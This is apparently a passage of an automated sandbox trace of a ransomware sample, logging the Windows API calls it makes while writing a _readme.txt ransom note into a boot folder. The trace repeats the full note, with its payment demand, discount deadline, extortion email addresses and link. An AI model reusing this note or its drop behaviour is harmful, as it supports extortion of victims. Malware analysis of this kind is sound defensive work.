hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.729] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0142.729] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.729] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.729] PathFindFileNameW (pszPath="") returned="" [0142.729] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.729] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.729] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.729] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.730] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0142.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.730] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0142.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.730] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.731] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.731] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.731] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.731] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.732] CloseHandle (hObject=0x6f0) returned 1 [0142.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.733] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.733] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.733] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.733] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8adacd0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.733] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8adacd0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.733] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.733] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] 